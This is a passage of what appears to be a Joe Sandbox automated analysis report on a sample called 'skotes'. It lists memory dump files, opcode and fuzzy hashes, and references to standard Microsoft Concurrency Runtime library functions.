                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3844194624-0
                                                                                                                                                                                                                                          • Opcode ID: 4075ab196ff51531553e6c8ce2b25f820dcecd4aa52654f0a19106ba44023a87
                                                                                                                                                                                                                                          • Instruction ID: b7df99c112ff2b000958073d1cfa2c4e444e13f6afcffa9f665712374a62412e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4075ab196ff51531553e6c8ce2b25f820dcecd4aa52654f0a19106ba44023a87
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C801D631201921AFDE65BB64D8C2E7EBBE9FF4571070101BAF81497652CB20FC11C791
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9D0C5
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9D0D7
                                                                                                                                                                                                                                            • Part of subcall function 00B9C6B2: _InternalDeleteHelper.LIBCONCRT ref: 00B9C6C4
                                                                                                                                                                                                                                          • ListArray.LIBCONCRT ref: 00B9D0E1
                                                                                                                                                                                                                                          • _InternalDeleteHelper.LIBCONCRT ref: 00B9D0FA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ArrayList$DeleteHelperInternal
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3844194624-0
                                                                                                                                                                                                                                          • Opcode ID: 1fe6947d6348cd772e6bcb4b79f2e05cac7b65938132a5b94416be6422b0f9d0
                                                                                                                                                                                                                                          • Instruction ID: 0f5018e3165391c7834bb5259b7fb910298a0b0b88aa86dcd97a0572848d2094
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1fe6947d6348cd772e6bcb4b79f2e05cac7b65938132a5b94416be6422b0f9d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EB01D632601521AFCE257B65D8C2D6DBBE9FF4571070005BAF800A7652CF20AC5187A1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::FindVirtualProcessor.LIBCMT ref: 00BA33DB
                                                                                                                                                                                                                                          • Concurrency::details::VirtualProcessor::ServiceMark.LIBCMT ref: 00BA33EF
                                                                                                                                                                                                                                          • Concurrency::details::SchedulingNode::GetNextVirtualProcessor.LIBCMT ref: 00BA3407
                                                                                                                                                                                                                                          • Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 00BA341F
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Virtual$Node::ProcessorSchedulingWork$FindItemItem::MarkNextProcessor::Service
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 78362717-0
                                                                                                                                                                                                                                          • Opcode ID: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                          • Instruction ID: d74038cfc309173a3a6b385b07780ffe14ad33ddb7c1037467f6420f76227ff5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed5c3284882ece478fbb3367f1f8f5dbd69f78bf790bb9c4c006e6817b181867
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B701DB32608514A7CF16EE548842AAF77D9DF46B50F100095FC159B341DE71EE1097A0
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::CurrentContext.LIBCMT ref: 00B99519
                                                                                                                                                                                                                                            • Part of subcall function 00B8F4CB: Concurrency::details::SchedulerBase::GetDefaultScheduler.LIBCONCRT ref: 00B95486
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::CancelCollection.LIBCONCRT ref: 00B9953D
                                                                                                                                                                                                                                          • Concurrency::details::_TaskCollectionBase::_FinishCancelState.LIBCMT ref: 00B99550
                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::CancelStealers.LIBCMT ref: 00B99559
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.2973332284.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973183378.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973332284.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2973940335.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974116469.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974330158.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974509112.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2974706941.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975510008.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975673102.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2975858151.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976010191.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976133799.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976372810.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976588375.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976731520.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2976855106.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977036956.0000000000D91000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977145651.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977257068.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977385733.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2977565674.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978449942.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978640930.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978752510.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978864602.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2978946296.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979012965.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979113130.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979526112.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979623514.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979728075.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979818464.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2979915094.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980008821.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980111926.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980212112.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980665830.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980796943.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2980939158.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981125789.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981254982.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981448988.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981597675.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981781764.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.2981910800.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Base::Concurrency::details::$CancelContextScheduler$Collection$Base::_Concurrency::details::_CurrentDefaultFinishStateStealersTask
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 218105897-0
                                                                                                                                                                                                                                          • Opcode ID: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction ID: e3b8bf0c073410dad8cfbe57bda5f93bcf282e1e7bd0261fab08fbd58d04e720
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4615e97fafe502f6002d1074aebf71b8ed261496fd89dd89418fafc456e0ff3f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 64F0A731204B105FEEA2BB5C8811F6B23D49F51711F01C4BEE45B97242CE24E942CB41
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::critical_section::unlock.LIBCMT ref: 00B8EFD1
                                                                                                                                                                                                                                            • Part of subcall function 00B8F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00B8F989
                                                                                                                                                                                                                                            • Part of subcall function 00B8F968: Concurrency::details::LockQueueNode::WaitForNextNode.LIBCMT ref: 00B8F9C0
                                                                                                                                                                                                                                            • Part of subcall function 00B8F968: Concurrency::details::LockQueueNode::DerefTimerNode.LIBCONCRT ref: 00B8F9CC
                                                                                                                                                                                                                                          • Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00B8EFDD
